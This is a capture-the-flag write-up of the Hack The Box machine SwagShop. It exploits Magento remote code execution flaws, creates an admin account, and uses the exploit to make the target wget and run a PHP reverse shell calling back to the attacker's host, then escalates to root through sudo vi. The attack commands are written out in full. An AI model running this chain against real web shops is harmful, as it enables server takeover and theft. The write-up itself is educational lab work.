info
Target IP: 10.10.10.140

Exploitation Summary

Initial Exploitation

  • Vulnerability: Remote code execution via Magento
  • Explanation: Magento has couple remote code execution vulnerabilities allowing admin account creation and then code execution through admin account

Privilege Escalation

  • Vulnerability: sudo vi capability
  • Explanation: shell can be obtained through vi

Enumeration

nmap -p- -A -T4 10.10.10.140
nmap
TCP 22: OpenSSH 7.2p2 Ubuntu
TCP 80: Apache 2.4.18

Initial Shell Exploitation

Only port 22 & 80 are open. Let’s check out the webpage

homepage

Browsing around the website and trying out some injections didn’t lead to anything particularly interesting. But notice the url looks interesting when browsing the login page

login page

The url shows some path parameter like syntax after index.php. So I decide to do directory search using gobuster on both / & /index.php

gobuster dir -u http://10.10.10.140:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307" -x "txt,html,php"
gobuster on /

A few files and folders are found. Browsing through them I am able to find a folder (/var/package/) of interests that could suggest the version of Magento is v1.9

guess version

Now check the results of gobuster searching on /index.php:

gobuster dir -u http://10.10.10.140:80/index.php -w /usr/
 share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403"
gobuster on index.php

Results show an interesting path /index.php/admin. Navigate to the path reveals it as the admin login page.

Tried some weak password guesses without success. Next is to check if Magento has any vulnerabilities

searchsploit RCE

A quick run on the exploit shows the script has syntax error. It is due to comments that are not in the right format. So remove them all (some at the beginning and some at the end) first. Next set the target variable to “http://10.10.10.140” and run again

set target
exploit failed

Still not working. Look at the script and it use the url /admin/Cms_Wysiwyg/directive/index/. Navigator to this url on browser shows that the url is not valid.

invalid url

Remember we found the admin login page at /index.php/admin but not /admin. So I changed the target to “http://10.10.10.140/index.php” instead and try again

exploit worked!

All right! Exploit works now. Let’s try to login as admin using credentials: forme:forme

admin logged in

When doing searchsploit, there’s another Remote code execution vulnerability but requires authentication. Now that we have admin login, we can try that exploit.

error

Check out the script shows that we need to modify some configurations in the script. So make changes as follow:

#Config.                                                     
username = 'forme'          
password = 'forme'          
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = b'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml

Now run the exploit. Note: the exploit requires module mechanize. You can install it using command pip install mechanize.

After checking out the script, it tries to add form new manually but is not required. So remove the following line:

remove line

Now run the script again and I get another error:

error 2

This error occurs when the script tries to search on content but failed to find expected info. Let’s modify the script and print out to see what content has returned.

web content

Run the script again to see the content

web content

It shows that No Data Found. It’s the same we see at admin page. Seems like they are related.

no data found

I play with the range and change it. All resulted in No Data Found until I try Range using 2YTD. It shows a word chart instead.

I use this hint to change script from 7d to 2y.

use 2y

Run script again

working

Finally get the exploit working. Awesome!

IMPORTANT: The exploit requires a valid transaction within the specified time frame. If there’s no transaction returned, the exploit will fail. If you encounter No Data Found even when using 2YTD, that means the transaction (originally created in the box) is too old. You have to create a new transaction by creating a user account, make a purchase and then create an invoice for the order at the admin panel.

I tried some simple reverse shell but all didn’t work. So I decide to upload a php reverse shell and then run it. Let’s first prepare the reverse shell to connect back to 10.10.14.48:4000

cat /usr/share/webshells/php/php-reverse-shell.php | sed "s/127.0.0.1/10.10.14.48/g" | sed "s/1234/4000/g" > shell4000.php

Now setup a simple http server: python -m SimpleHTTPServer 80 and use netcat to listen to port 4000: nc -nvlp 4000. Finally run the exploit again:

python3 37811.py http://10.10.10.140/index.php/admin "wget http://10.10.14.48/shell4000.php -O /tmp/shell4000.php"
python3 37811.py http://10.10.10.140/index.php/admin "php -f 
 /tmp/shell4000.php"

Initial shell obtained!

user flag
get user flag at /home/haris/user.txt

Privilege Escalation

sudo -l
sudo

We can perform sudo vi and inside vi we can run a shell using command :sh

sudo vi /var/www/html/api.php
root shell

Rooted!! Now we can capture the root flag.

Thank you for the box SwagShop, ch4p!

Leave a Reply

Close Menu